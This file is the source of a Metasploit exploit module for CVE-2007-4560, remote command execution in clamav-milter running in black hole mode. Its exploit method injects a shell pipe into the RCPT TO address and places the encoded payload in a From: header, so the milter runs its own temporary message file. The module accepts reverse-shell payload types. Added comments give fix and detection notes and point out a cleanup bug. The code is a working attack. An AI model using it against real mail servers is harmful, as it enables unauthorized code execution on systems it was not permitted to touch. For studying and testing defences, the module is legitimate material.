Path: blob/master/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2007-4560: command execution in clamav-milter when it
# runs in black hole mode (versions prior to 0.92.2, per the Description below).
# The module embeds a shell pipe in the local part of the RCPT TO address and
# relies on the insecure popen call the Description refers to.
#
# Defender notes (derived only from what this module sends):
#   - Fix: upgrade clamav-milter to 0.92.2 or later, or do not enable black
#     hole mode.
#   - Detection: the RCPT TO address carries a `+"|...` extension, and the
#     message consists of a single `From:` header followed by the end-of-data
#     line; both are visible in MTA/milter logs and in captures of the SMTP
#     session.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Presumably supplies connect_login, sock, disconnect and the SMTP-side
  # handling of the MAILTO option used below -- confirm against the mixin.
  include Msf::Exploit::Remote::Smtp

  # Module metadata and options.
  #
  # @param info [Hash] base module info, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
        'Description' => %q{
          This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
          (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
          When implemented with black hole mode enabled, it is possible to execute
          commands remotely due to an insecure popen call.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-4560' ],
          [ 'OSVDB', '36909' ],
          [ 'BID', '25439' ],
          [ 'EDB', '4761' ]
        ],
        'Privileged' => true,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' =>
          {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Automatic', {}],
        ],
        'DisclosureDate' => '2007-08-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # MAILTO is split on '@' in #exploit; nothing validates here that the
    # value contains one (see the note next to the split).
    register_options(
      [
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
      ]
    )
  end

  # Rewrites MAILTO so the RCPT TO address carries the injected command, opens
  # the SMTP session, sends a lone From: header holding the encoded payload,
  # then restores MAILTO and starts the handler.
  #
  # Side effect: datastore['MAILTO'] is mutated for the duration of the
  # session (see the NOTE(review) below on when it is restored).
  def exploit
    # ClamAV writes randomized msg.###### temporary files in a randomized
    # /tmp/clamav-#######################/ directory. This directory is
    # the clamav-milter process working directory.
    #
    # We *can* execute arbitrary code directly from 'sploit', however the
    # SMTP RFC rejects all payloads with the exception of generic CMD
    # payloads due to the IO redirects. I discovered that the 'From:'
    # header is written to this temporary file prior to the vulnerable
    # call, so we call the file itself and payload.encoded is executed.

    sploit = "sh msg*" # Execute the clamav-milter temporary file.

    # Create the malicious RCPT TO before connecting,
    # to make good use of the Msf::Exploit::Smtp support.

    oldaddr = datastore['MAILTO']
    # No check that MAILTO contains '@': without one, newaddr[1] is nil and
    # interpolates as an empty domain part in the rewritten address.
    newaddr = oldaddr.split('@')

    datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"

    # Presumably the Smtp mixin issues RCPT TO from datastore['MAILTO'] inside
    # connect_login, which is why the rewritten value must be in place first.
    connect_login

    sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
    sock.put(".\r\n") # bare '.' line ends DATA; the message has no other headers or body

    # Clean up RCPT TO afterwards

    # NOTE(review): the restore runs only on the success path. If connect_login
    # or sock.put raises, datastore['MAILTO'] keeps the rewritten address for the
    # next run; an `ensure` around the session would close that gap.
    datastore['MAILTO'] = oldaddr

    handler
    disconnect
  end
end